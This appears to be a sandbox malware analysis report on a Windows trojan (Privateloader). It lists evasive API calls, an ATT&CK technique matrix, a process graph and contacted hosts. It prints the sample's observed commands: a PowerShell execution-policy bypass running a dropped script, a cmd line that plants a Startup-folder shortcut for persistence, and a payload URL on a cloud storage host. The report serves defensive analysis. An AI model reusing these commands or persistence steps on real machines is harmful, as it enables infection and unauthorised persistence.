Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5071Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4799Jump to behavior
Source: C:\Users\Public\InformationCheck.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\file.exeAPI coverage: 3.4 %
Source: C:\Users\Public\InformationCheck.exeAPI coverage: 6.1 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978AB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF7978AB7C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978B72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF7978B72A8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978B71F4 FindFirstFileW,FindClose,0_2_00007FF7978B71F4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978ABC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF7978ABC70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978BA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF7978BA874
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978AC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF7978AC7C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978BA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF7978BA4F8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978B6428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF7978B6428
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978BA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF7978BA350
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797872F50 FindFirstFileExW,0_2_00007FF797872F50
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_004C4005
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004C494A GetFileAttributesW,FindFirstFileW,FindClose,3_2_004C494A
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_004CC2FF
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004CCD14 FindFirstFileW,FindClose,3_2_004CCD14
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_004CCD9F
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_004CF5D8
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_004CF735
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_004CFA36
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_004C3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F84005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00F84005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8494A GetFileAttributesW,FindFirstFileW,FindClose,8_2_00F8494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_00F8C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,8_2_00F8CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8CD14 FindFirstFileW,FindClose,8_2_00F8CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00F8F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00F8F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_00F8FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F83CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00F83CE2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797851D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF797851D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000001.00000002.2033706127.000001C734A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: powershell.exe, 00000001.00000002.2033706127.000001C734A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\InformationCheck.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C0A00 BlockInput,0_2_00007FF7978C0A00
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978337B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF7978337B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797855BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF797855BC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C7634 LoadLibraryA,GetProcAddress,0_2_00007FF7978C7634
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79789D868 WaitForSingleObject,UnloadUserProfile,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_00007FF79789D868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978557E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7978557E4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978559C8 SetUnhandledExceptionFilter,0_2_00007FF7978559C8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797878FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF797878FE4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79786AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79786AF58
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0048A354 SetUnhandledExceptionFilter,3_2_0048A354
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0048A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0048A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F4A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00F4A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F4A354 SetUnhandledExceptionFilter,8_2_00F4A354

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79789CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00007FF79789CE68
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978337B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF7978337B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978A9420 SendInput,keybd_event,0_2_00007FF7978A9420
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978AD1A4 mouse_event,0_2_00007FF7978AD1A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\Public\InformationCheck.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\Public\InformationCheck.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exitJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79789C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00007FF79789C858
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79789D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00007FF79789D540
Source: file.exe, 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1693624835.000002B512320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700160371.000002B512246000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exe, InformationCheck.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79786FD20 cpuid 0_2_00007FF79786FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79786BEF8 GetSystemTimeAsFileTime,0_2_00007FF79786BEF8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797892BCF GetUserNameW,0_2_00007FF797892BCF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797872650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00007FF797872650
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797851D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF797851D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
Source: file.exe, 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: file.exe, 00000000.00000003.1700160371.000002B512246000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00007FF7978C4074
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00007FF7978C3940
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004D696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,3_2_004D696E
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004D6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_004D6E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F9696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,8_2_00F9696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F96E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,8_2_00F96E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
2
Native API
1
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS26
System Information Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
211
Masquerading
LSA Secrets31
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials21
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Virtualization/Sandbox Evasion
DCSync3
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation
Proc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528956 Sample: file.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 47 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs 2->47 49 my.cloudme.com 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Sigma detected: Drops script at startup location 2->53 55 Binary is likely a compiled AutoIt script file 2->55 57 8 other signatures 2->57 10 file.exe 2 2->10         started        14 wscript.exe 1 1 2->14         started        signatures3 process4 file5 39 C:\Users\Public\InformationCheck.exe, PE32 10->39 dropped 41 C:\Users\Public\ProfileDetails.ps1, ASCII 10->41 dropped 61 Binary is likely a compiled AutoIt script file 10->61 63 Bypasses PowerShell execution policy 10->63 65 Drops PE files to the user root directory 10->65 16 powershell.exe 14 17 10->16         started        67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->67 20 SwiftWrite.pif 14->20         started        signatures6 process7 dnsIp8 45 my.cloudme.com 83.140.241.4, 443, 49730 PORT80SE Sweden 16->45 33 C:\Users\Public\Details.au3, Unicode 16->33 dropped 22 InformationCheck.exe 4 16->22         started        26 conhost.exe 16->26         started        file9 process10 file11 35 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 22->35 dropped 37 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 22->37 dropped 59 Drops PE files with a suspicious file extension 22->59 28 cmd.exe 2 22->28         started        signatures12 process13 file14 43 C:\Users\user\AppData\...\SwiftWrite.url, MS 28->43 dropped 31 conhost.exe 28->31         started        process15

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.exe32%ReversingLabsWin64.Trojan.Privateloader
file.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\Public\InformationCheck.exe3%ReversingLabs
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif3%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
my.cloudme.com
83.140.241.4
truefalse
    unknown
    nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
    unknown
    unknownfalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://my.cloudme.com/v1/ws2/:updatemake/:reality/reality.txtfalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.autoitscript.com/autoit3/Jfile.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2033706127.000001C734A92000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2950931190.0000000000529000.00000002.00000001.01000000.00000007.sdmpfalse
          unknown
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1809510030.000001C71DC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1809510030.000001C71D8F2000.00000004.00000800.00020000.00000000.sdmpfalse
            unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://go.microsoft.co-powershell.exe, 00000001.00000002.2021600603.000001C73479E000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmpfalse
                unknown
                https://go.micropowershell.exe, 00000001.00000002.1809510030.000001C71D11F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://my.cloHpowershell.exe, 00000001.00000002.1809510030.000001C71D11F000.00000004.00000800.00020000.00000000.sdmpfalse
                  unknown
                  https://contoso.com/powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1809510030.000001C71DC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://oneget.orgXpowershell.exe, 00000001.00000002.1809510030.000001C71D8F2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://aka.ms/pscore68powershell.exe, 00000001.00000002.1809510030.000001C71C291000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://my.cloudme.compowershell.exe, 00000001.00000002.1809510030.000001C71D11F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
